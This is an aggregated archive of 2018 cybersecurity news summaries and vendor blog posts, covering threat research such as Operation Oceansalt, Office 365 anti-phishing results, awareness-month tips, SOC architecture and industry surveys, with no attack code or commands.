Category Archives: Cybersecurity

Vulnerable controllers could allow attackers to manipulate marine diesel engines

Researchers have found several authentication and encryption vulnerabilities in the firmware of marine diesel engine controllers by Norwegian company Auto-Maskin, as well as the accompanying Android app. These security flaws could be exploited by attackers to change the firmware and configuration files, install malware, and perform actions that effectively allow them to take control of a vessel’s engines. The vulnerabilities The four vulnerabilities were unearthed by infosec researchers Brian Satira and Brian Olson, who share … More

The post Vulnerable controllers could allow attackers to manipulate marine diesel engines appeared first on Help Net Security.

Operation Oceansalt research reveals cyber-attacks targeting South Korea, USA and Canada

McAfee released a report announcing the discovery of a new cyber espionage campaign targeting South Korea, the United States and Canada. The new campaign uses a data reconnaissance implant last used in 2010 by the hacker group APT1, or Comment Crew, a Chinese military-affiliated group accused of launching cyber-attacks on more than 141 U.S. companies from 2006 to 2010. The actors of this new campaign have not been identified; however, they reused code from implants … More

The post Operation Oceansalt research reveals cyber-attacks targeting South Korea, USA and Canada appeared first on Help Net Security.

Solving the cloud infrastructure misconfiguration problem

Security incidents involving cloud infrastructure have become a regular occurrence since many organizations began shifting their assets to the cloud. Many of these incidents happen because of misconfiguration. “Cloud misconfiguration is a pervasive issue for a variety of reasons,” says Phillip Merrick, CEO of Fugue. “Development teams might provision cloud infrastructure that contains compliance violations or security vulnerabilities because they either lack sufficient training or there’s a lack of proper controls to ensure compliance up … More

The post Solving the cloud infrastructure misconfiguration problem appeared first on Help Net Security.

Targeted attacks on crypto exchanges resulted in a loss of $882 million

Group-IB has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534 million in crypto was stolen. Crypto exchanges: In the footsteps of Lazarus In … More

The post Targeted attacks on crypto exchanges resulted in a loss of $882 million appeared first on Help Net Security.

Clarity and focus on security required for successful digital transformation

Digital transformation is all around us. Even if you are living under a rock, I am sure you have great Wi-Fi reception and are still able to do your shopping, pay your bills, access entertainment (which is especially important because life under the rock can be boring), and pretty much do everything else you can think of, with just a computer or a smart device with internet access. Things get even more interesting if you … More

The post Clarity and focus on security required for successful digital transformation appeared first on Help Net Security.

Knowing how to define, screen and monitor your third parties is essential to minimizing risk

A new NAVEX Global survey found that more than a third of organizations still use paper-based records or disparate office productivity software to administer their third-party risk assessment and management programs. How best-in-class organizations address third-party risks “There’s a growing realization that third-party risk management should operate within an organization’s larger ethics and compliance program,” said Michael Volkov, CEO of The Volkov Law Group. “Enforcement agencies expect companies to use the same level of automation … More

The post Knowing how to define, screen and monitor your third parties is essential to minimizing risk appeared first on Help Net Security.

‘Operation Oceansalt’ Delivers Wave After Wave

A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass any logical wall set before them. In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets. The new report “Operation Oceansalt Attacks South Korea, U.S., and Canada with Source Code from Chinese Hacker Group” analyzes these waves and their victims, primarily in South Korea but with a few in the United States and Canada.

Although one reaction is to marvel at the level of innovation displayed by the threat actor(s), we are not discussing five new, never-before-seen malware variants—rather the reuse of code from implants seen eight years prior. The Oceansalt malware uses large parts of code from the Seasalt implant, which was linked to the Chinese hacking group Comment Crew. The level of reuse is graphically depicted below:

Code Visualization of Recent Oceansalt with Older Seasalt

Oceansalt, 2018.

Seasalt, 2010.

Who is Behind the Oceansalt Attack?

Originally taking the title APT1, the Comment Crew was seen as the threat actor conducting offensive cyber operations against the United States almost 10 years before. The obvious suspect is Comment Crew and, although this may seem a logical conclusion, we have not seen any activity from this group since they were initially exposed. Is it possible that this group has returned and, if so, why target South Korea?

It is possible that the source code developed by Comment Crew has now been used by another adversary. The code to our knowledge, however, has never been made public. Alternatively, this could be a “false flag” operation to suggest that we are seeing the re-emergence of Comment Crew. Creating false flags is a common practice.

What Really Matters

It is likely that reactions to this research will focus on debating the identity of the threat actor. Although this question is of great interest, answering it will require more than the technical evidence that private industry can provide. These limitations are frustrating. However, we can focus on the indicators of compromise presented in this report to detect, correct, and protect our systems, regardless of the source of these attacks.

Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown. However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets. We often talk about partnerships within the private and public sector as the key to tackling the cybersecurity challenges facing society. The bad actors are not putting these initiatives on PowerPoint slides and marketing material; they are demonstrating that partnerships can suit their ends, too.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

How Office 365 learned to reel in phish

Today’s post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Jason Rogers, Principal Group Program Manager at Microsoft.

We recently reported how we measure catch rates of malicious emails for Office 365 Exchange Online Protection (EOP) (available with any Office 365 subscription) and Advanced Threat Protection (ATP) (available as a standalone service or with Office 365 E5).

Today, we’re sharing the results from the enhancements we made to anti-phish capabilities for Office 365 to address impersonation, spoof, and phish content and internal phish emails sent from compromised accounts. Over the last year, Microsofts threat analysts discovered threat actors pivoting from malware to sophisticated, often targeted phishing campaigns. The scale of these attacks and how quickly users click through on malicious links is shown in Figure 1.

Figure 1. Phish email statistics from Office 365 from January 2018 to September 2018.

Understanding the phish landscape

To develop solutions mitigating these modern phishing campaigns, our engineers rigorously analyzed phish emails in Office 365, uncovering a general pattern of phish campaigns following the path shown in Figure 2.

Figure 2. Phish email campaign pathway from initial reconnaissance to data exfiltration.

Additionally, since Office 365 is one of the worlds largest email service providers, Microsoft gains visibility and experience across mostif not alltypes of cyber threats. Every day, Microsoft analyzes 6.5 trillion signals, and each month we analyze 400 billion emails, while detonating 1 billion items in our sandbox. This telemetry helps us understand the full spectrum of phish attacks and the sophisticated and varied methods used by attackers, summarized in Figure 3. With this understanding of the phish landscape, our engineers not only designed new capabilities, but also enhanced existing capabilities to address the phishing emails being launched at customers.

Figure 3. Phish emails attack spectrum and variety of attack methods.

Understanding the situation

When we began our journey of enhancing our anti-phish capabilities, we admittedly were not best of breed at mitigating phish. As we alluded to previously, transparency with customers is a core priority at Microsoft. Figure 4 shows the number of phish emails that Microsoft (Office 365) missed in comparison to several other vendors also protecting email for customers within Office 365.

From November 2017 to January 2018, you see that Office 365 (orange bar in Figure 4) was not the best solution at phish catch. (We previously discussed how we measure phish catch.) The values are based on normalized email volume. As the inset plot shows, the scale of mail volume in Office 365 far exceeds the mail volume of third-party vendors. Fundamentally, this scale is one our differentiators and strengths as it offers us much greater depth and breadth into the threat landscape.

Figure 4. Normalized phish email miss from November 2017 to January 2018 in Office 365 email traffic. Inset shows actual mail flow volume.

Solving the problem with our technology, operations, and partnerships

Leveraging our signal from mail flow, the expertise of 3,500 in-house security professionals, and our annual $1 billion investment in cybersecurity, we strategically addressed the growing wave of phishing campaigns. Our engineers determined four categories of phish emails and designed capabilities addressing each type. Figure 5 summarizes the enhancements made to the anti-phish capabilities in Office 365.

Figure 5. Phish email categories and anti-phish enhancements made in Office 365 to address the categories.

Details on all the anti-phish updates for Office 365 are available in the following posts:

While the enhancements are interesting, ultimately, catch rate is the parameter that counts, and it is important to remember that no solution can ever stop all threats. Sometimes misses occur, and the most effective solution will miss the least. To this end, we are very excited to share our phish miss rate from May 1, 2018 to September 16, 2018. As you can see in Figure 6, today, when compared to the same set of vendors that we compared ourselves to in November to January, we exhibit the lowest miss rate of phish emails in Office 365. Figure 6 is the culmination of the incredible focus, drive, and expertise of Microsoft researchers and engineers working together to push the boundaries of threat research, machine learning, and development of algorithms that together provide customers the most impressive and effective protection against phish emails available for Office 365 today.

Figure 6. Normalized Phish Email Miss Rate in Office 365 from May 1, 2018 to September 16, 2018. Inset is a blowup of the graph from August 1, 2018 to September 16, 2018.

While the graph in Figure 6 is illuminating, we also want to share statistics from Office 365 EOP/ATP related to phish mitigation. Figure 7 is a summary of the remarkable impact these powerful new anti-phish capabilities across EOP/ATP have had with helping secure Office 365 users, and further showcases our tremendous depth and scale into the threat landscape. For those unfamiliar with Office 365 ATP, Safe Links provides time of click protection from malicious links in email where the click triggers several different protection technologies, including URL reputation checks, machine learning capabilities, and link detonation as needed. Recently, Safe Links expanded its capabilities to intra-org emails, making Office 365 ATP the only service to offer this type of protection while ensuring the internal emails remain within the compliance boundary of Office 365. We hope you agree at that the anti-phish capabilities have evolved at a remarkable pace and with amazing results.

Figure 7. The impact to end users from the enhanced anti-phish capabilities in Office 365.

Learn more

We hope this post provides a good overview on how we are helping customers with modern phishing campaigns. Please be sure to check out the Ignite session, Secure enterprise productivity with Office 365 threat protection services including EOP, ATP, and Threat Intelligence, where we give more details. Your feedback enables us to continue improving and adding features that will continue to make ATP the premiere advanced security service for Office 365. If you have not tried Office 365 ATP for your organization yet, you should begin a free Office 365 E5 trial today and start securing your organization from the modern threat landscape.

The post How Office 365 learned to reel in phish appeared first on Microsoft Secure.

What is Machine Learning – and how can it protect you?

Computers are not only becoming faster, but also smarter. A new technology called “Machine Learning” (or ML for short) is changing the way companies process and analyse information – but these developments have important implications for you too.

So, what is Machine Learning?

Computers that can teach themselves

In the past, computers have been very limited in what they can do. You fed information in, and some pre-configured software analysed that data using some very limited algorithms to generate useful insights. Very large companies could adjust and update those algorithms, but the process takes time, effort and cash.

Machine Learning changes the scenario slightly. Instead of having people build and adjust the algorithm, the computer is trained to do the job on its own. Data is fed into the system, and the ML engine searches for patterns and statistically important information automatically.

Once trained, the Machine Learning system can analyse huge amounts of data more quickly – and more accurately – than a human. Which means that businesses using ML can make decisions more quickly and improve the quality of service they offer to their customers.

What does that mean for you?

Machine Learning is already working behind the scenes at many companies, so you may have encountered it without even realising. Take the Google Translate service for instance. In the past, Google had to program the translation between two languages – like English and Japanese.

Using all the information gathered by their search engine, Google then built the Google Neural Machine Translation (GNMT) to translate between different language pairs. The system can now convert Japanese to Korean without ever having been “taught”. And because the ML teaches itself, the quality and accuracy of translation continues to improve.

Using Machine Learning to keep you safe

Machine Learning can be applied to almost any challenge – including keeping you safe online. Panda has now integrated artificial intelligence into the Dome product line to better protect their users for instance.

In the past, anti-malware products could only detect known viruses – and there was always a delay between malware being discovered, and a fix being developed. Until a fix is released, your computer was unprotected, leaving you at an increased risk of infection.

Our new artificial intelligence-driven system is a lot smarter. Panda Dome monitors every process running on your computer – including the ones you can’t see. It then detects every fluctuation and change, blocking anything suspicious before your computer can be infected.

Panda Dome is constantly learning – from your computer and all the others it is installed on across the world. This allows the anti-malware engine to learn to detect suspicious behaviour even more quickly, blocking malware before it has been officially recognised, categorised and patched. Total security is virtually instant thanks to the power of machine learning.

To learn more about ML-powered anti-malware – and to better protect your computer and smartphone right now – download a free trial of Panda Dome here.

The post What is Machine Learning – and how can it protect you? appeared first on Panda Security Mediacenter.

Endpoint security solutions challenged by zero-day and fileless attacks

There is an endpoint protection gap against modern threats, the result of a recent survey by the Ponemon Institute and Barkly have shown. The organizations polled 660 IT and security professionals to get insight on the state of endpoint security risk, and have found that: 64% of organizations experienced a successful endpoint attack in 2018 (a 20% increase from the previous 12-month period). 63 percent say that the frequency of attacks they’re facing has also … More

The post Endpoint security solutions challenged by zero-day and fileless attacks appeared first on Help Net Security.

Why we need to bridge the gap between IT operations and IT security

Thycotic released the findings from its 2018 VMworld survey of more than 250 IT operations professionals which looked into their experiences in using cybersecurity tools on a daily basis, including their concerns and preferences. According to the findings, even though IT operations personnel help influence the selection of cybersecurity tools, nearly two out of three say complexity in deployment (30 percent) and complexity in daily use (34 percent) are the biggest hindrances in security tool … More

The post Why we need to bridge the gap between IT operations and IT security appeared first on Help Net Security.

Protecting applications from malicious scripts

In 2018, malicious client-side scripts are still posing a problem for large organizations. This year, British Airways revealed that they suffered a data breach in which 380,000 records were exfiltrated. Now, NewEgg has been hit with a similar data breach. This follows a string of attacks from a group known as Magecart, who were also responsible for publicized data breaches of Ticketmaster and Feedlify. Any time malicious Javascript is loaded onto a critical page– for … More

The post Protecting applications from malicious scripts appeared first on Help Net Security.

How corporate boards are navigating cybersecurity risks and data privacy

Digital transformation initiatives have transcended beyond the sole domain of IT to involve the entire organization, elevating digital strategy to the top of the board agenda, according to BDO USA. “Developing a strategic path for an organization’s digital transformation and devoting company resources and board oversight to cybersecurity and data privacy are now necessities for businesses to survive and thrive during this time of intense change,” said Amy Rojik, national assurance partner and director of … More

The post How corporate boards are navigating cybersecurity risks and data privacy appeared first on Help Net Security.

Few organizations use cyber wargaming to practice response plan

Nearly half (46 percent) of executive-level respondents to a Deloitte poll say their organizations have experienced a cybersecurity incident over the past year, with more than 1,500 surveyed professionals feeling only “somewhat confident” in their organization’s ability to respond to and remediate a cyber incident. With cybercrime expected to reach $6 trillion annually and no indication of a slowdown in cyber threats, the Deloitte poll taken during a webcast on cyber preparedness and wargaming exposes … More

The post Few organizations use cyber wargaming to practice response plan appeared first on Help Net Security.

NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work

October is National Cyber Security Awareness Month (NCSAM). NCSAM is a great initiative to help educate and inform our friends and family on the importance of taking your digital security seriously. Week Three in particular aims to help users fuse cybersecurity across their work and personal lives and emphasizes the shared responsibility of employees to […]… Read More

The post NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work appeared first on The State of Security.

The Importance of Security Awareness in Our Connected Lifestyle

Not very long ago, people could be seen walking around waving their mobile phones in the air, looking for a network connection. Today, we are talking 5G! Our kids just can’t imagine a world without gadgets and internet! Little kids as young as four can turn on and instruct Alexa, search for new games on smartphones and talk to digital devices.

Moving Toward an Increasingly Connected Lifestyle

Ours is a connected world and we are constantly connected to the internet- be it through our smartphones, digital assistants, gaming and reading devices, laptops, wearable devices, remote monitoring devices like CCTV and many more. While this leads to time saving, higher efficiency, and greater comfort, there are a few safety checks, which if ignored, may lead to data and ID thefts.

I was recently reading an article on the 5G revolution. South Korea, I believe, already enjoys phenomenal browsing and download speeds, and so will rest of the world very soon. It will also hopefully reduce lags and connectivity disruptions that we currently experience. More IoT (Internet of Things) devices will come into play and home Wi-Fi routers will have a larger count of devices connected to it. Needless to say, this calls for ensuring maximum security for the router as well as all our devices.

Moreover, we often use public Wi-Fi connections to browse; which expose us to possible cyber attacks. Often, something as innocuous as using external storage devices or delaying the installation of updates can lead to malware entering the device system. What happens if cyber attackers worm into our systems? They can spy on us, regulate our smart devices, and even listen in on our baby monitor, to name a few.

As many countries observe October as Cybersecurity Month, it is the right time to have a discussion on how we can keep our connected homes safe.

Let’s discuss some of the common causes that can lead to device hacking:

  • Software updating not done: Security companies and your OS vendors keep sending patches to give cover for latest viruses and thus enhance protection against cyberattacks. Delay in patch installation exposes our device to attacks. It is therefore advisable to set updates to automatic.
  • Increasing use of IoT devices: Our smartwatch or smartphone, digital assistants or digital toys are all connected to Wi-Fi. This offers cyber criminals a bigger hunting ground. They try to find and exploit vulnerabilities in these devices
  • Outdated security: Despite being aware of safety issues related to not securing devices with licensed comprehensive software, we often neglect this very important step. At best, we download and use free security tools which may not offer cover against more sophisticated attacks.
  • Carelessness of users: But the security chain also includes us, the users. We may click on malicious links or download infected files. We may also visit unsafe websites, making it easy for cyber criminals to target us

How to use smart devices safely:

  • Use unique, complex passphrases: Strong passphrases (not passwords you will notice) will go a long way in keeping hackers at bay. If the thought of remembering several passphrases daunts you, go for a password manager
  • Set up autolock: Set up autolock and PIN protect your devices. Modern devices offer biometric locks as well. Make use of them
  • Keep auto update turned on: This way your OS and security tool would always receive patches and updates on time and you will receive maximum protection
  • Check security settings before buying IoT devices: Before buying any connected toy or device, research the manufacturer to find out if they give security top priority. Check out the security they offer and change default passcodes. Also, do read the terms and conditions to know how the vendor plans to secure your data
  • Secure your home Wi-Fi router: As this will be the point for connecting with the net, this device needs to be secured with a strong passphrase. It’s a good idea to change the passphrase from time to time. Keep an eye on data consumption too
  • Install and run licensed comprehensive security software: Don’t go for free, your devices and your personal data are at stake here. Instead, use a comprehensive security solutionto protect your technology
  • Be aware: Awareness pays. If you know of the latest threats doing the round, you would take necessary precautions and share your knowledge with friends and family accordingly

We can do it, can’t we? A few simple measures help secure our digital lives and allow us to take full advantage of what tech has to offer. Let us be ready to welcome 5G in our lives.

Stay safe, stay secure!

 

The post The Importance of Security Awareness in Our Connected Lifestyle appeared first on McAfee Blogs.

Working Together to Ensure Better Cybersecurity

For many, it’s hard to picture a work environment that doesn’t revolve around the use of technology. Digital, cloud-based services coupled with access through mobile and IoT devices have completely reshaped organizations by streamlining business processes and enabling people to work anywhere, anytime. Thanks to these advances, there have also been a variety of recent shifts in how employers and employees interact with each other, ranging from liberal remote work policies companies asking employees to bring their own devices to work.

Often these changes feel remarkable, efficient and convenient, as they make our work lives much more efficient – but these advancements also create concerns around cybersecurity. Many devices contain both personal and professional data , and when we take our work home or on the go with us, we’re not constantly protected by a company firewall, safe Wi-Fi, or other standard cybersecurity measures. Regardless of what industry you are in, online safety is no longer just IT’s problem. Cybersecurity is now a shared responsibility between an organization and its employees.

Naturally, these changes require education and communication around cybersecurity best practices in order to develop positive habits that will keep both employers and employees safe. Getting a habit to stick also requires an organization to develop culture of security in tandem, in which every individual and department is accountable for cybersecurity and bands together with the shared objective of staying secure.

October is National Cybersecurity Awareness Month, which is a great time to look at how everyone can be a part of the cybersecurity solution within their organization. If cybersecurity has not historically not been a priority within an organization, starting a conversation about it can be difficult, whether you’re an employee or an employer. Consider using these tips to start thinking about personal cybersecurity and how that translates into an overall cybersecurity plan within your organization.

Employers can take the following steps:

  • Identify which company assets are of greatest value, then ensure security measures are in place. Employee, customer, and payment data are all assets that cybercriminals could leverage via phishing, malware, password breaches, and denial-of-service (DoS) attacks. Begin to develop a formal cybersecurity plan based on your specific needs.
  • Set up an alert system. Put a system into place that will alert employees and your organization of an incident. This also includes an avenue for employees to report problems they might notice before they become widespread. The sooner people know about a vulnerability, the faster they can respond and take action.
  • Develop a response plan. Practice an incident response plan to contain an attack or breach. Keep in mind the goal of maintaining business operations in the short term while assessing the long-term effects of the cyber incident.

Employees can follow these guidelines:

  • Regularly update your device’s software. This is the easiest way to ensure your devices are equipped with vital patches that protect against flaws and bugs that cybercriminals can exploit.
  • Take security precautions, even if your company isn’t there yet. Professional and personal information is often intertwined on our devices – especially our mobile phones. Keep all your data secure with comprehensive mobile security, such as McAfee® Mobile Security. Then work within your organization to develop a cybersecurity plan that works for all.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Working Together to Ensure Better Cybersecurity appeared first on McAfee Blogs.

2018 US voter records offered for sale on hacking forum

Somebody is selling US voter registration databases on an English-language speaking dark web hacker forum and the offer comes with the promise they will be updated every week, Anomali and Intel 471 researchers have discovered. About the databases for sale The databases include information about voters of 19 US states: Montana, Louisiana, Iowa, Utah, Oregon, South Carolina, Wisconsin, Kansas, Georgia, New Mexico, Minnesota, Wyoming, Kentucky, Idaho, Tennessee, South Dakota, Mississippi, West Virginia and Texas. Anomali … More

The post 2018 US voter records offered for sale on hacking forum appeared first on Help Net Security.

9 in 10 organizations have a cybersecurity culture gap

With cybersecurity threats continuing to escalate worldwide, the ISACA/CMMI Institute Cybersecurity Culture Report found that just 5 percent of employees think their organization’s cybersecurity culture is as advanced as it needs to be to protect their business from internal and external threats. Cybersecurity culture is a workplace culture in which security awareness and behaviors are integrated into everyone’s daily operations, as well as an executive leadership priority. In a threat-ripe environment, an effective cybersecurity culture … More

The post 9 in 10 organizations have a cybersecurity culture gap appeared first on Help Net Security.

You are who you say you are: Establishing digital trust with the blockchain

Over the last few years, blockchain use has gained popularity driven partly by the interest in cryptocurrency, but mostly with the growing understanding of what distributed ledger technology can enable through decentralization of trust. Most large companies have innovation teams looking at ways that blockchain technology can be applied, and many analyst firms, system integrators and other influencers have focused teams providing advice on applications of blockchain technology. I have spoken to experts at leading … More

The post You are who you say you are: Establishing digital trust with the blockchain appeared first on Help Net Security.

Exploring the current state of employee knowledge in cybersecurity and data privacy

Seventy-five percent of professionals pose a moderate or severe risk to the corporate data of the companies they work for. According to MediaPRO’s third-annual State of Privacy and Security Awareness Report, workers in the financial sector are more likely to be a risk with 85 percent of survey respondents falling into one of the two risk categories. MediaPRO surveyed more than 1,000 employees across the U.S. to quantify the state of privacy and security awareness … More

The post Exploring the current state of employee knowledge in cybersecurity and data privacy appeared first on Help Net Security.

Legacy government networks stifle cloud migration

67 percent of government agencies’ legacy network infrastructures are simply not prepared to handle the cloud migration lift or keep pace with the changing demands of cloud and hybrid networks, according to MeriTalk. One of the biggest areas holding agencies back is the chaos and lack of prioritization to properly update networks necessary for cloud adoption and IT modernization efforts, 51 percent of managers reported. Respondents also noted that to reach their cloud goals, agencies … More

The post Legacy government networks stifle cloud migration appeared first on Help Net Security.

CYBER ARMS – Computer Security: Basic Security Testing with Kali Linux Giveaway Contest

Want a chance to get a signed copy of my latest Kali Linux book? I am giving away a total of 10 signed copies of “Basic Security Testing with Kali Linux, 3rd Edition”!

Simply follow, like and share this article, or my official Twitter or Instagram announcement, for a chance to win a signed copy of my new book!

10 lucky winners will be randomly selected on October 31st.

The Contest is for those living in the United States only. I may do another one for international readers in the future.

Liking this article & sharing the Official Contest announcements on Twitter and Instagram will increase your chances of winning.  Winners will be notified on October 31st. If a winner cannot be notified or does not respond by the end of the first week of November, another winner will be picked.

Good luck!

 







CYBER ARMS – Computer Security

Microsoft Secure: Making it real—harnessing data gravity to build the next gen SOC

This post was coauthored by Diana Kelley, Cybersecurity Field CTO, andSin John,EMEA Chief Security Advisor, Cybersecurity Solutions Group.

In our first blog, Diana and I talked about the concept of data gravity and how it could, conceptually, help organizations take a more cloud-ready approach to security operations and monitoring. In this post we address the question: How do we make this a reality in the security operations center (SOC) while we are under increased and constant pressure from motivated threat actors?

The answer lies in a new approach to monitoring called Security Orchestration, Automation and Response (SOAR), which is founded upon addressing the challenge of connecting and investigating issues across multiple security platforms. SOAR addresses the challenges of evolving security operations beyond the traditional security information and event management (SIEM) model into one that allows correlation across all the data gravity wells. Core to this is being able to take an event from one system (for example an endpoint like a laptop) and in real-time correlate that across different systemssuch as a mail hygiene gatewayin order to build evidence and apply context needed for a fast and efficient investigation. This is something that analysts have historically done manually to investigate an issue: look across multiple different evidence points to find the information behind an event to determine if its a false positive or if needs further investigation. Historically deciding what incidents need investigation was left to the SIEM model, but as we discussed in the last blog both the difficulties with false positives and the rules of data gravity make this more difficult to achieve.

Lets discuss how this can be achieved using Microsoft as an example.

We have a number of significant areas of data gravity within the technology that Microsoft customers use. These are Office 365, Windows, and Azure, each with a different focus and level of protection, but is what we need bring to together to share insights and events across these technical areas. This is where the Intelligent Security Graph comes into play for us. This is a subset of the Microsoft Graph focused specifically on sharing security information and insights that we see across our infrastructure:

Each of the areas of security products we have integrated with the graph allow us to share insights across different areas and build orchestration capability, context, and automation across systems without necessarily having to pull them all into one single aggregated log store. Analysis is done, as and when required, often driven by the machine learning and behavioral techniques that help to determine what information is needed.

The next step is to make this information available to others and why we released the graph security API. This is an open and free API that allows customers to interrogate Microsoft data in real-time for alerts and context that the Office 365, Windows, and Azure security systems hold. This allows organizations to integrate alerts into their own SOC or build automated playbooks and investigations built across the platform. This isnt just about orchestrating across Microsoft. The law of data gravity says that we must integrate with others and many leading security vendors have also integrated into the API to provide information into our platform for integration, and also to allow them to real-time query Microsoft to provide context in their own platforms.

When insights across multiple data gravity wells can be accessed and correlated in near real-time, the SOC analyst can spend far less time writing SIEM rules and more time tuning orchestration and automation that is focused on improving insight, reducing false positives, and investigating the important information. The capability that SOC vendors should be focusing on is building a real-time investigation platform that enables analysts to investigate security event signal across multiple vendors and investigate in real-time, by respecting the laws of data gravity. Meaningful insights and reducing mean time to identify (MTTI) and mean time to remediate (MTTR) are far better measures of SOC effectiveness than how many events per second (EPS) are processed.

To make the SOC of tomorrow a reality, the question you ask your security vendors needs to change. Instead of asking Can you send all your logs into my SIEM? ask these questions instead:

  • How do you orchestrate events across your own platform?
  • Do you provide APIs for me to query in real-time?
  • How do you integrate with other vendors?
  • What partnerships, orchestration, and automation capabilities do you have?

The SOC of tomorrow must look across multiple data sources, gravity wells, and hybrid clouds to provide a complete look at a company’s security posture. Look for vendors that understand this new architectural approach and are building cloud-aware solutions for tomorrow, not ones that are locked into an on-premises-centric past.

The post Making it real—harnessing data gravity to build the next gen SOC appeared first on Microsoft Secure.



Microsoft Secure

Making it real—harnessing data gravity to build the next gen SOC

This post was coauthored by Diana Kelley, Cybersecurity Field CTO, andSin John,EMEA Chief Security Advisor, Cybersecurity Solutions Group.

In our first blog, Diana and I talked about the concept of data gravity and how it could, conceptually, help organizations take a more cloud-ready approach to security operations and monitoring. In this post we address the question: How do we make this a reality in the security operations center (SOC) while we are under increased and constant pressure from motivated threat actors?

The answer lies in a new approach to monitoring called Security Orchestration, Automation and Response (SOAR), which is founded upon addressing the challenge of connecting and investigating issues across multiple security platforms. SOAR addresses the challenges of evolving security operations beyond the traditional security information and event management (SIEM) model into one that allows correlation across all the data gravity wells. Core to this is being able to take an event from one system (for example an endpoint like a laptop) and in real-time correlate that across different systemssuch as a mail hygiene gatewayin order to build evidence and apply context needed for a fast and efficient investigation. This is something that analysts have historically done manually to investigate an issue: look across multiple different evidence points to find the information behind an event to determine if its a false positive or if needs further investigation. Historically deciding what incidents need investigation was left to the SIEM model, but as we discussed in the last blog both the difficulties with false positives and the rules of data gravity make this more difficult to achieve.

Lets discuss how this can be achieved using Microsoft as an example.

We have a number of significant areas of data gravity within the technology that Microsoft customers use. These are Office 365, Windows, and Azure, each with a different focus and level of protection, but is what we need bring to together to share insights and events across these technical areas. This is where the Intelligent Security Graph comes into play for us. This is a subset of the Microsoft Graph focused specifically on sharing security information and insights that we see across our infrastructure:

Each of the areas of security products we have integrated with the graph allow us to share insights across different areas and build orchestration capability, context, and automation across systems without necessarily having to pull them all into one single aggregated log store. Analysis is done, as and when required, often driven by the machine learning and behavioral techniques that help to determine what information is needed.

The next step is to make this information available to others and why we released the graph security API. This is an open and free API that allows customers to interrogate Microsoft data in real-time for alerts and context that the Office 365, Windows, and Azure security systems hold. This allows organizations to integrate alerts into their own SOC or build automated playbooks and investigations built across the platform. This isnt just about orchestrating across Microsoft. The law of data gravity says that we must integrate with others and many leading security vendors have also integrated into the API to provide information into our platform for integration, and also to allow them to real-time query Microsoft to provide context in their own platforms.

When insights across multiple data gravity wells can be accessed and correlated in near real-time, the SOC analyst can spend far less time writing SIEM rules and more time tuning orchestration and automation that is focused on improving insight, reducing false positives, and investigating the important information. The capability that SOC vendors should be focusing on is building a real-time investigation platform that enables analysts to investigate security event signal across multiple vendors and investigate in real-time, by respecting the laws of data gravity. Meaningful insights and reducing mean time to identify (MTTI) and mean time to remediate (MTTR) are far better measures of SOC effectiveness than how many events per second (EPS) are processed.

To make the SOC of tomorrow a reality, the question you ask your security vendors needs to change. Instead of asking Can you send all your logs into my SIEM? ask these questions instead:

  • How do you orchestrate events across your own platform?
  • Do you provide APIs for me to query in real-time?
  • How do you integrate with other vendors?
  • What partnerships, orchestration, and automation capabilities do you have?

The SOC of tomorrow must look across multiple data sources, gravity wells, and hybrid clouds to provide a complete look at a company’s security posture. Look for vendors that understand this new architectural approach and are building cloud-aware solutions for tomorrow, not ones that are locked into an on-premises-centric past.

The post Making it real—harnessing data gravity to build the next gen SOC appeared first on Microsoft Secure.

A week in security (October 8 – 14)

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 8 – 14) appeared first on Malwarebytes Labs.

Google to Encrypt Android Cloud Backups With Your Lock Screen Password

In an effort to secure users' data while maintaining privacy, Google has announced a new security measure for Android Backup Service that now encrypts all your backup data stored on its cloud servers in a way that even the company can't read it. Google allows Android users to automatically backup their essential app data and settings to their Google account, allowing them to simply restore it

The future of OT security in modern industrial operations

Both the likelihood and consequences of cyberattacks to OT/ICS components continue to grow for modern industrial operations. In this podcast, Andrew Ginter, VP of Industrial Security at Waterfall Security Solutions, and Edward Amoroso, CEO of TAG Cyber, talk about how new approaches are needed to gain defensive advantage over already-capable cyber adversaries, to keep up with new OT/ICS technologies, and to serve business risk management needs in increasingly-demanding, competitive environments. Here’s a transcript of the … More

The post The future of OT security in modern industrial operations appeared first on Help Net Security.

Scaling the IoT product security lifecycle with automation

Recent events around the globe once again shine a limelight on the security issues the IoT community is facing. From claimed attacks on chlorine plants in Ukraine to potential threats to entire medical systems, IoT devices have left their users at a disadvantage against attackers, and the reason might just be that the security minds of our generation are still approaching product security in a traditional way – manually. The IoT security value chain continues … More

The post Scaling the IoT product security lifecycle with automation appeared first on Help Net Security.

Stringent password rules lower risk of personal data breaches

The all-too-common practice of using the same email address/password combination to log into multiple websites can be damaging, especially for employers with many users and valuable assets protected by passwords, like universities. “If someone uses their university email address and passphrase to sign up for, say, LinkedIn, and LinkedIn is breached by cybercriminals, that would mean their university password is sitting on the web for everyone to see,” said Indiana University’s Dan Calarco, co-author on … More

The post Stringent password rules lower risk of personal data breaches appeared first on Help Net Security.

Kaspersky Lab official blog: 5 tips to protect your home network

For the second year in a row, Kaspersky Lab has signed on as an official Champion of National Cyber Security Awareness Month (NCSAM). Over the course of the month, we will be focusing on security topics that can be used by both businesses and consumers alike. For the first week, we will focus on securing your home.

So, let’s get started. Do you:

